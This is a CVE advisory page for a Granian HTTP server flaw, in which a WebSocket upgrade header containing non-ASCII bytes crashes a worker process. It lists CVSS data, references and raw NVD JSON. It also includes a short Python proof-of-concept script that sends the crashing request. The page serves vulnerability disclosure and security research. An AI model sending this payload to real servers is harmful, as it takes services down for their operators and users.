CVE-2026-42544

Description

Granian is a Rust HTTP server for Python applications. From 1.2.0 to 2.7.4, Granian aborts a worker process when an unauthenticated client sends a WebSocket upgrade request whose Sec-WebSocket-Protocol header contains non-ASCII bytes. The crash happens in Granian's WebSocket scope construction path, before the ASGI application is invoked. This vulnerability is fixed in 2.7.4.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

Granian 1.2.0

Granian 2.7.4

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import socket

# Target configuration
host = "127.0.0.1"
port = 8000

# Malicious payload containing non-ASCII bytes (\xff) in Sec-WebSocket-Protocol
payload = (
    "GET / HTTP/1.1\r\n"
    f"Host: {host}\r\n"
    "Upgrade: websocket\r\n"
    "Connection: Upgrade\r\n"
    "Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==\r\n"
    "Sec-WebSocket-Version: 13\r\n"
    "Sec-WebSocket-Protocol: chat, \xff\xfe\r\n"  # Injecting non-ASCII bytes
    "\r\n"
)

# Send the malicious request
try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    s.send(payload.encode('utf-8'))
    print("[+] Malicious payload sent successfully.")
    s.close()
except Exception as e:
    print(f"[-] Error: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-42544
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-42544
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-42544/
[4] VulDB https://vuldb.com/cve/CVE-2026-42544
[5] https://github.com/emmett-framework/granian/security/advisories/GHSA-vrg7-482j-p6f6

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-42544", "sourceIdentifier": "[email protected]", "published": "2026-05-12T22:16:34.467", "lastModified": "2026-05-13T16:10:57.817", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Granian is a Rust HTTP server for Python applications. From 1.2.0 to 2.7.4, Granian aborts a worker process when an unauthenticated client sends a WebSocket upgrade request whose Sec-WebSocket-Protocol header contains non-ASCII bytes. The crash happens in Granian's WebSocket scope construction path, before the ASGI application is invoked. This vulnerability is fixed in 2.7.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-20"}, {"lang": "en", "value": "CWE-248"}, {"lang": "en", "value": "CWE-400"}]}], "references": [{"url": "https://github.com/emmett-framework/granian/security/advisories/GHSA-vrg7-482j-p6f6", "source": "[email protected]"}]}}